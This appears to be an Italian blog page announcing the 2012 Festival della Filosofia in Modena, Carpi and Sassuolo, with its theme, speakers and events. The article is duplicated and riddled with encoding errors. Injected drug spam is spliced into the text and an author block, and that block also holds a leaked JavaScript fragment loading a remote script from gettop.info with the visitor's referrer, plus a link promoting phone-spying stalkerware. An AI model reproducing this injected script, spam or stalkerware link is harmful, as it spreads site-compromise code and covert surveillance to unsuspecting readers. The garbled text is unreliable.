Festival della Filosofia 2012

Festival della Filosofia 2012

Da venerdA� 14 a domenica 16 settembre a Modena, Carpi e Sassuolo quasi 200 appuntamenti fra lezioni magistrali, mostre, concerti, spettacoli e cene filosofiche.

Tra i protagonisti Bauman, AugA�, Searle, Sennett, Latouche, la cinese Anne Cheng, Cacciari, Galimberti, Severino e Bodei

Un concetto chiave della tradizione filosofica e una questione cruciale della��esperienza contemporanea. A? “cose” il tema dell’edizione 2012 che si svolge a Modena, Carpi e Sassuolo dal 14 al 16 settembre in 40 luoghi diversi delle tre cittA�. Lezioni magistrali, mostre, spettacoli, letture, giochi per bambini e cene filosofiche. Gli appuntamenti sono quasi 200 e tutti gratuiti.

Il festival, che lo scorso anno ha registrato oltre 176 mila presenze, A? promosso dal a�?Consorzio per il festivalfilosofiaa�?, i cui fondatori a�� ovvero i Comuni di Modena, Carpi e Sassuolo, la Provincia di Modena, la Fondazione Collegio San Carlo e la Fondazione Cassa di Risparmio di Modena a�� sono i soci storici che hanno partecipato alla realizzazione del festival fin dalla prima edizione. Piazze, chiese e cortili ospitano le oltre 50 lezioni magistrali del festival, che vede questa��anno tra i protagonisti, tra gli altri, Enzo Bianchi, Massimo Cacciari, Roberta de Monticelli, Roberto Esposito, Maurizio Ferraris, Umberto Galimberti, Sergio Givone, Salvatore Natoli, Giovanni Reale, Stefano RodotA�, Salvatore Settis, Emanuele Severino, Carlo Sini e Remo Bodei, Presidente del Comitato scientifico del Consorzio. Molti anche i filosofi stranieri, circa un quarto del totale, a segnare una��edizione fortemente internazionale: tra loro i francesi Bruno Latour, Serge Latouche e Marc AugA�, che fa parte del comitato scientifico del Consorzio; lo spagnolo Francisco Jarauta; i britannici Richard Sennett e Scott Lash; la��americano John Searle; il polacco Zygmunt Bauman, da quaranta��anni esule in Inghilterra, e il suo connazionale Krzysztof Pomian, esule viceversa in Francia; Anne Cheng, formazione francese e origine cinese. Si distinguerA� Alessandro Bergonzoni in una vera e propria lezione magistrale, con la sua vertiginosa inventiva linguistica.

Il programma delle lezioni magistrali si svolge alla��insegna della domanda filosofica sulle cose (suscitata dalla meraviglia che qualcosa ci sia e alla ricerca di a�?cosaa�? sia), riconoscendo che in questo tema si scorge il luogo materiale e teorico di alcune delle piA? caratteristiche trasformazioni della contemporaneitA�. I maestri del pensiero che il festivalfilosofiaA�porterA� nelle piazze e nei cortili delle tre cittA� si confronteranno con il pubblico sulle varie declinazioni contemporanee delle cose, tracciando linee tematiche che affrontano, tra le altre, la questione della a�?cosa stessaa�?, lo statuto della produzione e i suoi processi, le implicazioni del consumo, il carattere di feticcio assunto dalle cose, nonchA� le passioni che esse suscitano.

Il programma filosofico del festival propone anche la sezione a�?la lezione dei classicia�?: esperti eminenti commenteranno i testi che, nella storia del pensiero occidentale, hanno costituito modelli o svolte concettuali rilevanti per il tema delle cose, da Platone ad Aristotele, da Adam Smith a Hegel e Marx, fino alle elaborazioni novecentesche di Husserl, Heidegger, Benjamin e Arendt , con in piA? un fuori pista comparativo sul pensiero confuciano.

Se le lezioni magistrali sono il cuore della manifestazione, un vasto programma creativo coinvolge narrazioni e le performance, la musica i libri, le iniziative per bambini e ragazzi.

Oltre 20 le mostre proposte in occasione del festival: tra cui una grande retrospettiva italiana dedicata al fotografo americano Edward Weston, una personale di Andrea Chiesi, una��esposizione di figurine sul a�?fascino discreto degli oggettia�?, una dedicata alla storia e al mito delle collezioni Panini. Si segnaleranno la��installazione a�?Il dono della massaa�? curata dalla��Istituto Nazionale di Fisica Nucleare e a�?Cose #6a�? dei Masbedo.

E, accanto a pranzi e cene filosofici ideati dalla��Accademico dei Lincei Tullio Gregory per i circa sessanta ristoranti ed enoteche delle tre cittA�, nella notte di sabato 15 settembre A? previsto il a�?Tiratardia�?, con iniziative e aperture di gallerie e musei fino alle ore piccole.

Da venerdA� 14 a domenica 16 settembre a Modena, Carpi e Sassuolo quasi 200 appuntamenti fra lezioni magistrali, mostre, concerti, spettacoli e cene filosofiche.

Tra i protagonisti Bauman, AugA�, Searle, Sennett, Latouche, la cinese Anne Cheng, Cacciari, Galimberti, Severino e Bodei

Un concetto chiave della tradizione filosofica e una questione cruciale della��esperienza contemporanea. A? “cose” il tema dell’edizione 2012 che si svolge a Modena, Carpi e Sassuolo dal 14 al 16 settembre in 40 luoghi diversi delle tre cittA�. Lezioni magistrali, mostre, spettacoli, letture, giochi per bambini e cene filosofiche. Gli appuntamenti sono quasi 200 e tutti gratuiti.

Il festival, che lo scorso anno ha registrato oltre 176 mila presenze, A? promosso dal a�?Consorzio per il festival Cheap filosofiaa�?, i cui fondatori a�� ovvero i Comuni di Modena, Carpi e Sassuolo, la Provincia di Modena, la Fondazione Collegio San Carlo e la Fondazione Cassa di Risparmio di Modena a�� sono i soci storici che hanno partecipato alla realizzazione del festival fin dalla prima edizione. Piazze, chiese e cortili ospitano le oltre 50 lezioni magistrali del festival, che vede questa��anno tra i protagonisti, tra gli altri, Enzo Bianchi, Massimo Cacciari, Roberta de Monticelli, Roberto Esposito, Maurizio Ferraris, Umberto Galimberti, Sergio Givone, Salvatore Natoli, Giovanni Reale, Stefano RodotA�, Salvatore Settis, Emanuele Severino, Carlo Sini e Remo Bodei, Presidente del Comitato scientifico del Consorzio. Molti anche i filosofi stranieri, circa un quarto del totale, a segnare una��edizione fortemente internazionale: tra loro i francesi Bruno Latour, Serge Latouche e Marc AugA�, che fa parte del comitato scientifico del Consorzio; lo spagnolo Francisco Jarauta; i britannici Richard Sennett e Scott Lash; la��americano John Searle; il polacco Zygmunt Bauman, da quaranta��anni esule in Inghilterra, e il suo connazionale Krzysztof Pomian, esule viceversa in Francia; Anne Cheng, formazione francese e origine cinese. Si distinguerA� Alessandro Bergonzoni in una vera e propria lezione magistrale, con la sua vertiginosa inventiva linguistica.

Il programma delle lezioni magistrali si svolge alla��insegna della domanda filosofica sulle cose (suscitata dalla meraviglia che qualcosa ci sia e alla ricerca di a�?cosaa�? sia), riconoscendo che in questo tema si scorge il luogo materiale e teorico di alcune delle piA? caratteristiche trasformazioni della contemporaneitA�. I maestri del pensiero che il festivalfilosofiaA�porterA� nelle piazze e nei cortili delle tre cittA� si confronteranno con il pubblico sulle varie declinazioni contemporanee delle cose, tracciando linee tematiche che affrontano, tra le altre, la questione della a�?cosa stessaa�?, lo statuto della produzione e i suoi processi, le implicazioni del consumo, il carattere di feticcio assunto dalle cose, nonchA� le passioni che esse suscitano.

Il programma filosofico del festival propone anche la sezione a�?la lezione dei classicia�?: esperti eminenti commenteranno i testi che, nella storia del pensiero occidentale, hanno costituito modelli o svolte concettuali rilevanti per il tema delle cose, da Platone ad Aristotele, da Adam Smith a Hegel e Marx, fino alle elaborazioni novecentesche di Husserl, Heidegger, Benjamin e Arendt , con in piA? un fuori pista comparativo sul pensiero confuciano.

Se le lezioni magistrali sono il cuore della manifestazione, un vasto programma creativo coinvolge narrazioni e le performance, la musica i libri, le iniziative per bambini e ragazzi.

Oltre 20 le mostre proposte in occasione del festival: tra cui una grande retrospettiva italiana dedicata al fotografo americano Edward Weston, una personale di Andrea Chiesi, una��esposizione di figurine sul a�?fascino discreto degli oggettia�?, una dedicata alla storia e al mito delle collezioni Panini. Si segnaleranno la��installazione a�?Il dono della massaa�? curata dalla��Istituto Nazionale di Fisica Nucleare e a�?Cose #6a�? dei Masbedo.

E, accanto a pranzi e cene filosofici ideati dalla��Accademico dei Lincei Tullio Gregory per i circa sessanta ristoranti ed enoteche delle tre cittA�, nella notte di sabato 15 settembre A? previsto il a�?Tiratardia�?, con iniziative e aperture di gallerie e musei fino alle ore piccole.

Per il programma completo visita:A�www.festivalfilosofia.it Cheap order diabecon side prevacid shortage

 

Agata Marchese

  Purchase taking 40mg of cialis, cialis for young men. }s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; prilosec bunco online levitra tablets Pills Order http://olett.com/gsp-tracker-track-my-girlfriends-iphone-mobile-phone-spy/

Lascia un Commento

L'indirizzo email non verrà pubblicato. I campi obbligatori sono contrassegnati *

È possibile utilizzare questi tag ed attributi XHTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>